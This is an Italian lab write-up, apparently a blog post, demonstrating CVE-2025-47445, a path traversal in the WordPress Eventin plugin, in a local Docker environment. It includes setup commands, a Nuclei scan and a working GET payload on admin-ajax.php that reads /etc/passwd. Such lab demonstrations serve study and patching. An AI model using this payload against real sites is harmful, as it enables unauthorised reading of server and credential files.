
Exploit proof-of-concept per CVE-2025-47445, una vulnerabilità di path traversal nel plugin WordPress Eventin. Include istruzioni di configurazione per un ambiente Docker locale e passaggi di sfruttamento manuale.
| Info |
|---|
| Plugin WordPress: | Wordpress Eventin |
| Versione plugin: | 4.0.26 (o precedenti) |
| Informazioni CVE: | Project Discovery - Vulnerability library |
| CVEdetails.com | |
| Strumenti di interesse: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
Worfence Docker WordPress Research Lab viene fornito con due ambienti diversi, uno con una versione PHP più vecchia. Noi opteremo per quello più recente.
# In the dockerwp84 folder
docker-compose build
docker-compose up -d
Dopodiché ho configurato la pagina WordPress tramite localhost:1337. Ho scaricato il plugin Eventin, specificamente la versione 4.0.26 dallo store dei plugin e l'ho installato e attivato tramite l'interfaccia di WordPress.
Ora tutto dovrebbe essere pronto.
Voglio vedere se Nuclei riesce a trovare la CVE che cerco, quindi eseguo un'istanza tramite un contenitore Docker temporaneo.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
Ho provato a eseguire Nuclei diverse volte e ho ottenuto risultati diversi, non so il perché. Ma alla fine trova la CVE, e un paio di altre cose che non stavo cercando specificamente.

Per vedere se posso accedere al file /etc/passwd, inserisco semplicemente il seguente payload nella mia richiesta GET.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
Ed è stato un successo.

Questo è stato fatto per scopi educativi.
Assicurati di aggiornare tutto il tuo software. Nuove CVE vengono scoperte ogni giorno.